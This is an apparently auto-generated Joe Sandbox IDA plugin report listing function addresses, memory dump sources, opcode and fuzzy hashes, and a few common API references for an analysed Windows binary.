Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 02a2a1f9a0cf8f6b01319e12b5159be1016d063e46aa3985e4325ff5d3ca68fc
Instruction ID: b5467942561c6d8d7bcddbe2a4f42e85dc3fcf865a6f1351fe8aee3355835b72
Opcode Fuzzy Hash: 02a2a1f9a0cf8f6b01319e12b5159be1016d063e46aa3985e4325ff5d3ca68fc
Instruction Fuzzy Hash: C4D19132A0C7C189EB71DB29A40036DABA5F7C1B84F854131DAAD43BE5CF6CD451DB62

Function 00007FF7FE92E921 Relevance: 1.5, Strings: 1, Instructions: 292COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF7FE92E95C

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: a672de6a9a1e741416923e1bb8c3dc9b28d81655a3be1efc1448c097c95fe0dc
Instruction ID: 568e75e9cdf35af54215533cba8f34935da3ff3b0975901255b063ee05b2c1a6
Opcode Fuzzy Hash: a672de6a9a1e741416923e1bb8c3dc9b28d81655a3be1efc1448c097c95fe0dc
Instruction Fuzzy Hash: 75D1AE36A08A8681EF74DB15D0442BEA7A0FBC5B44F964131DA9D137D8DF3CD885C7A2

Function 00007FF7FE908700 Relevance: 1.5, APIs: 1, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef2272a0f78c5654064ad74c49a74cf11d8d22a4fca1baf4497d5dd01ee95b31
Instruction ID: b0652389fdc33ea0cc61ae7d444249cee0dd7432224e8924d30186515627ac74
Opcode Fuzzy Hash: ef2272a0f78c5654064ad74c49a74cf11d8d22a4fca1baf4497d5dd01ee95b31
Instruction Fuzzy Hash: D4A1F4A2B0869586EB71EB3594043BDBA91BB85744FC48132DF79973C4DA3CE90187A2

Function 00007FF7FE90BA10 Relevance: 1.5, APIs: 1, Instructions: 26timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7FE90BA29

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 5b458f31904d003d62d7b214ea92e562cda0075e699945dad1b957b80cd35887
Instruction ID: 1a4c5ef904dbce17a658363f194cd2c4e86ebe4570c6a90cf3fe132da3da31e5
Opcode Fuzzy Hash: 5b458f31904d003d62d7b214ea92e562cda0075e699945dad1b957b80cd35887
Instruction Fuzzy Hash: ECF054A6B1894986DF20EF15E440169B3A1FBDCBC4F444521DF5D03768EE2CD6518B11

Function 00007FF7FE986E20 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

basic_filebuf::_M_convert_to_external conversion error, xrefs: 00007FF7FE98711C

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: basic_filebuf::_M_convert_to_external conversion error
API String ID: 0-246983510
Opcode ID: 5bdba4f057ed6a4bdbc0b2c394bfd8afd034b3af7077c14c8f37d7421ea512d3
Instruction ID: 4eed8e1e131bda7158205ed066311ce950603a3b3c8581145e36f7918ba59209
Opcode Fuzzy Hash: 5bdba4f057ed6a4bdbc0b2c394bfd8afd034b3af7077c14c8f37d7421ea512d3
Instruction Fuzzy Hash: B481D173A14A4184DB20EF69E4402ADA760FB85BD8FD44132DE6C57BE9CF38D985C361

Function 00007FF7FE9327F0 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00007FF7FE932851

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: ab350a58110a3a7e0a6f882a1379fe249b8483456ad330f3f7beee01339b9a29
Instruction ID: 80d311adcda907e97a768c86bb921b18ede440242b648cd5e53479cce0092850
Opcode Fuzzy Hash: ab350a58110a3a7e0a6f882a1379fe249b8483456ad330f3f7beee01339b9a29
Instruction Fuzzy Hash: 3A919332A0D7D689EB30DA2590407BAE796EBD1B44F844535CAAD03BD8CF6CD450A7B2

Function 00007FF7FE931230 Relevance: 1.4, APIs: 1, Instructions: 190COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00007FF7FE931291

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: 813a4e92e0b8b97ee3d56b8a4c89069d7e8e0c0fdf415172fb87219d2adf07cb
Instruction ID: 2ecd57b7187c4a0fb31b5b1507db5132af272f3d59843f5301ce9c6d92ea8ccd
Opcode Fuzzy Hash: 813a4e92e0b8b97ee3d56b8a4c89069d7e8e0c0fdf415172fb87219d2adf07cb
Instruction Fuzzy Hash: 6881943260D6C649EB70DA26D04077EE756EBD1B84F440532CAAE43BE5CF6CD450A7B2

Function 00007FF7FE903240 Relevance: 1.4, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22751c93db6d628848ca7aa585a5d8244f69de91a57a6c3b46f2c46647f811e3
Instruction ID: 0ff6140ad4b0bdd961e541fcbc843122c3c8480f698a4aea1c3cdcf339c142a1
Opcode Fuzzy Hash: 22751c93db6d628848ca7aa585a5d8244f69de91a57a6c3b46f2c46647f811e3
Instruction Fuzzy Hash: C841E263701A819ADB04DB29D6046ADBB61FB98B99FC9C136CF1E43381EB38E544C361

Function 00007FF7FE909290 Relevance: 1.3, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7FE9092F2

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 2e04a752f991dd715433093b7f7b9477ecf3b69b7f2472420f4dac5672a4aef8
Instruction ID: a3a073ba57cae14f0d05649e7f6f17c2f0487946e119300104aa9dd8dc664c7a
Opcode Fuzzy Hash: 2e04a752f991dd715433093b7f7b9477ecf3b69b7f2472420f4dac5672a4aef8
Instruction Fuzzy Hash: 1D31F623F04A514AD714EF2D94006BAB791BBD9754FC88130DF2E573D4DA38E906C391

Function 00007FF7FE94A990 Relevance: 1.0, Instructions: 969COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b5e4634271d3640c3336e2830fab88148846f68d87ad3240da5a9ec70bb412
Instruction ID: 8fccb9eb83409dfda1d66ce6e3864188be348c1bf4b852f55f2781deb09f341e
Opcode Fuzzy Hash: 69b5e4634271d3640c3336e2830fab88148846f68d87ad3240da5a9ec70bb412
Instruction Fuzzy Hash: 8BA2A12260CA8586D774DF29E04436AF7A0F7C5B84F908135DAAD03BD8EF7DD8548BA1

Function 00007FF7FE94BC50 Relevance: 1.0, Instructions: 960COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ecce70b00fb3390feb803f081a562a3253c21e5f76b352907934c53308d778f
Instruction ID: 4034225257c9273faa41ee458993b7ec39549201a83e5b7a2c13cf62697bd2b0
Opcode Fuzzy Hash: 7ecce70b00fb3390feb803f081a562a3253c21e5f76b352907934c53308d778f
Instruction Fuzzy Hash: 31A2712260C7C589E774EE29D04036AB7A0F7C5B84F908132DAAD43BD4DF7DD4948BA2

Function 00007FF7FE94CF30 Relevance: .9, Instructions: 949COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ee56b339440e1ea38b96387dc373d3280384db55e6e3cedfb223c5e2b76f43
Instruction ID: 3100fa0ed5dbc797ae9550684fa5a2ebc8373b2780b3cee85fe7f87aca8e4a4f
Opcode Fuzzy Hash: d9ee56b339440e1ea38b96387dc373d3280384db55e6e3cedfb223c5e2b76f43
Instruction Fuzzy Hash: CDA2A12660CB8185E734DB29D04436AF7A0FBC5B84F909131DAAD03BE4DF7DD4958BA2

Function 00007FF7FE94E1B0 Relevance: .9, Instructions: 945COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce151537e439f1c5ea2b0b7cde5485d8930908eb19f615bdb563c62c15fc7e0
Instruction ID: 350575032dbe022394af397c566dbd509af2ffb598a1ea12d228f98e71b2930b
Opcode Fuzzy Hash: 7ce151537e439f1c5ea2b0b7cde5485d8930908eb19f615bdb563c62c15fc7e0
Instruction Fuzzy Hash: E5A2B222A0CBC585EB74DB29E40036AB7A0F7C5B94F908531DAAD07BD4DF7CD4548BA2

Function 00007FF7FE94F410 Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311149bd64372aba16e764e55d1116e7952d22f63514468e1b6cdfdfd49ff587
Instruction ID: 0f2c89db01db064b6257399f72794199481462095f63bfee1c6f2ab4d3740430
Opcode Fuzzy Hash: 311149bd64372aba16e764e55d1116e7952d22f63514468e1b6cdfdfd49ff587
Instruction Fuzzy Hash: 4B929122A0CB8685E734DB29E04037EB7A1F785B94F909131DAAD03BD4DF7CD4558BA2

Function 00007FF7FE955570 Relevance: .7, Instructions: 731COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: a2648ac45f47a8e1ced8e9b4578819266624799d1219554754c51dd901406cc3
Instruction ID: 696ee4bb03d572c4f258de87758129a9d26f7db384f8ad2d65d8ff37001ad3c8
Opcode Fuzzy Hash: a2648ac45f47a8e1ced8e9b4578819266624799d1219554754c51dd901406cc3
Instruction Fuzzy Hash: 63624436608B8185D760EF65E8402AEB7A4F788B90F904126EFDD53BA9CF3CD454CB61

Function 00007FF7FE9122D0 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aea3bd9e7e81fe36b615eeea4a85a90974a6c5f5482d049e9029fe1425db4b9
Instruction ID: 2790ebfab3a641d84987304e9fb2082804108e94a61f9a37f65d03be3669b971
Opcode Fuzzy Hash: 4aea3bd9e7e81fe36b615eeea4a85a90974a6c5f5482d049e9029fe1425db4b9
Instruction Fuzzy Hash: F442BF32A086418AEB65EE19E40036EE7A0FBC5BA4F944531DE6D437D8DF3CE441A7B1

Function 00007FF7FE8F51C0 Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cb16a5b97a582556b18f09ed2899ade9d7ad12ac74a933e72b3b6a4594a0bf
Instruction ID: c9ed8f17caa739a7ebd56f6bc53c7585e59fe8bcf47db229e6a2118d612e49bd
Opcode Fuzzy Hash: 20cb16a5b97a582556b18f09ed2899ade9d7ad12ac74a933e72b3b6a4594a0bf
Instruction Fuzzy Hash: 5512E291E2D2C645FB68BB6554053799A829BF1B94FC8A031C63D077C6DE2CECB183E0

Function 00007FF7FE93A210 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3614eb0a2ece0b757884358fb35bf96a3836e119f90dcb001d308acec02cf8c1
Instruction ID: 240059ef3a113d9d45781b298447e237765e96c64ef615217b0e657040947536
Opcode Fuzzy Hash: 3614eb0a2ece0b757884358fb35bf96a3836e119f90dcb001d308acec02cf8c1
Instruction Fuzzy Hash: F2B1D232B08B8189E770EB25A4401AEA3A5FBC57D4F948131EE9D13BC8DF7CD8919761

Function 00007FF7FE93A680 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40636c6d7ff16b4e513a627c7898b961d2966c0125db1ef803243f1cd7b6da54
Instruction ID: 0bee757176052ba14361d3f7912ec059c4cdd45603f19bb3149c2e4100a5234d
Opcode Fuzzy Hash: 40636c6d7ff16b4e513a627c7898b961d2966c0125db1ef803243f1cd7b6da54
Instruction Fuzzy Hash: 1071D432B0868289E770EB15E4401BEA3A9FB847D4F948131EEAE13BD4DE7CD581D761

Function 00007FF7FE92D47F Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
